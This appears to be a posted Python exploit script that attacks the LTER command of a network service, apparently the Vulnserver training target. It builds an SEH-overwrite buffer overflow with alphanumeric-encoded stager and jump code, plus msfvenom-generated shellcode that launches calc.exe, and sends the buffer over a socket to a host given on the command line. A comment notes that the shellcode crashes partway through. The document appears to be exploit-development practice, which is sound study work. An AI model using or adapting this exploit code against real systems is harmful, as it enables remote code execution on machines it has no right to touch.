LTER wot??

1. #!/usr/bin/env python                                                                                                                                            
2.                                                                                                                                                                  
3. import socket                                                                                                                                                    
4. from struct import pack
5. import sys
6.                                        
7. host = sys.argv[1]                      
8. port = int(sys.argv[2])
9.  
10. seh = pack("<I", 0x6250172B)
11. nseh = "\x43\x43\x75\xff"
12.  
13. # End of D's BEFFFF
14. # Beginning of A's BEF230
15. # First aligned A at BEF239
16. # A's offset: DBF (-3519 bytes)
17. # ESP offset from D's: 11AF (-4527 bytes)
18.  
19. stager = "\x54\x58" # push esp, pop eax
20. stager += "\x66\x05\x7f\x11" # add ax, 0x1170 | 4464 bytes
21. stager += "\x50\x5c" # push eax, pop esp
22.  
23.  
24. """
25. jmp2buff asm
26. nasm > mov ebx, esp
27. 00000000  89E3              mov ebx,esp
28. nasm > sub bx, 0xdba
29. 00000000  6681EBBA0D        sub bx,0xdba
30. nasm > sub bx, 0xd8a
31. 00000000  6681EB8A0D        sub bx,0xd8a
32. nasm > push ebx
33. 00000000  53                push ebx
34. nasm > pop esp
35. 00000000  5C                pop esp
36. nasm > call esp
37. 00000000  FFD4              call esp
38. """
39.  
40. jmp2buff = ""
41. jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
42. jmp2buff += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
43. jmp2buff += "\x05\x36\x77\x63\x41" ## add  eax, 0x41637736
44. jmp2buff += "\x05\x35\x66\x62\x41" ## add  eax, 0x41626635
45. jmp2buff += "\x05\x24\x55\x42\x41" ## add  eax, 0x41425524
46. jmp2buff += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
47. jmp2buff += "\x50"                 ## push eax
48. jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
49. jmp2buff += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
50. jmp2buff += "\x05\x76\x45\x07\x32" ## add  eax, 0x32074576
51. jmp2buff += "\x05\x75\x45\x06\x21" ## add  eax, 0x21064575
52. jmp2buff += "\x50"                 ## push eax
53. jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
54. jmp2buff += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
55. jmp2buff += "\x05\x45\x72\x33\x41" ## add  eax, 0x41337245
56. jmp2buff += "\x05\x44\x71\x33\x40" ## add  eax, 0x40337144
57. jmp2buff += "\x50"                 ## push eax
58.  
59. # msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -b '\x00' -e x86/alpha_mixed BufferRegister=ESP -f c
60. # shellcode gets loaded into ESP, then called, and ends up dying 3/4 of the way through in a recursive SEH chain
61.  
62. shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
63. "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
64. "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
65. "\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6d\x38\x4d\x52\x57\x70"
66. "\x75\x50\x35\x50\x71\x70\x6e\x69\x4a\x45\x75\x61\x49\x50\x62"
67. "\x44\x4e\x6b\x66\x30\x74\x70\x4c\x4b\x43\x62\x34\x4c\x6e\x6b"
68. "\x36\x32\x47\x64\x4e\x6b\x54\x32\x76\x48\x54\x4f\x4c\x77\x43"
69. "\x7a\x77\x56\x45\x61\x6b\x4f\x6c\x6c\x45\x6c\x70\x61\x43\x4c"
70. "\x45\x52\x56\x4c\x75\x70\x39\x51\x78\x4f\x54\x4d\x65\x51\x49"
71. "\x57\x68\x62\x78\x72\x36\x32\x71\x47\x4c\x4b\x52\x72\x72\x30"
72. "\x4e\x6b\x42\x6a\x45\x6c\x6e\x6b\x70\x4c\x52\x31\x43\x48\x6a"
73. "\x43\x67\x38\x55\x51\x78\x51\x52\x71\x6e\x6b\x36\x39\x65\x70"
74. "\x47\x71\x79\x43\x4e\x6b\x43\x79\x72\x38\x49\x73\x37\x4a\x77"
75. "\x39\x4e\x6b\x30\x34\x6c\x4b\x75\x51\x79\x46\x46\x51\x59\x6f"
76. "\x4c\x6c\x69\x51\x4a\x6f\x66\x6d\x33\x31\x6b\x77\x46\x58\x4d"
77. "\x30\x34\x35\x4c\x36\x33\x33\x31\x6d\x6c\x38\x45\x6b\x61\x6d"
78. "\x54\x64\x42\x55\x69\x74\x70\x58\x4e\x6b\x73\x68\x55\x74\x36"
79. "\x61\x7a\x73\x35\x36\x4c\x4b\x64\x4c\x50\x4b\x4e\x6b\x50\x58"
80. "\x47\x6c\x67\x71\x5a\x73\x6c\x4b\x66\x64\x6c\x4b\x47\x71\x6a"
81. "\x70\x4e\x69\x53\x74\x65\x74\x57\x54\x43\x6b\x31\x4b\x63\x51"
82. "\x50\x59\x73\x6a\x53\x61\x79\x6f\x49\x70\x71\x4f\x61\x4f\x50"
83. "\x5a\x6e\x6b\x46\x72\x78\x6b\x6e\x6d\x73\x6d\x51\x7a\x46\x61"
84. "\x6c\x4d\x4f\x75\x4e\x52\x77\x70\x67\x70\x65\x50\x42\x70\x50"
85. "\x68\x36\x51\x6e\x6b\x70\x6f\x6b\x37\x69\x6f\x48\x55\x6f\x4b"
86. "\x49\x70\x37\x6d\x54\x6a\x34\x4a\x31\x78\x4d\x76\x4a\x35\x4f"
87. "\x4d\x4d\x4d\x59\x6f\x6b\x65\x65\x6c\x34\x46\x43\x4c\x75\x5a"
88. "\x4f\x70\x49\x6b\x6b\x50\x33\x45\x63\x35\x6f\x4b\x62\x67\x47"
89. "\x63\x44\x32\x30\x6f\x62\x4a\x67\x70\x51\x43\x79\x6f\x78\x55"
90. "\x71\x73\x61\x71\x30\x6c\x52\x43\x34\x6e\x42\x45\x54\x38\x73"
91. "\x55\x63\x30\x41\x41")
92.  
93. # Overflowed with lter.spk "LTER /.:/(3520 A's)"
94. # NSEH overwritten at 3495
95. # SEH overwritten at 3499
96.  
97. buffer = "LTER /.:/"
98. buffer += "A"*4
99. buffer += shellcode
100. buffer += "A"*2927
101. buffer += stager
102. buffer += jmp2buff
103. buffer += "A"*43
104. buffer += nseh
105. buffer += seh
106. buffer += "D"*(1000-len(nseh)-len(seh))
107.  
108. try:
109.     print "[+] Connecting to target"
110.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
111.     s.connect((host, port))
112.     s.recv(1024)
113.     print "[+] Sent payload with length: %d" % len(buffer)
114.     s.send(buffer)
115.     s.close()
116. except:
117.     print "[-] Something went wrong :("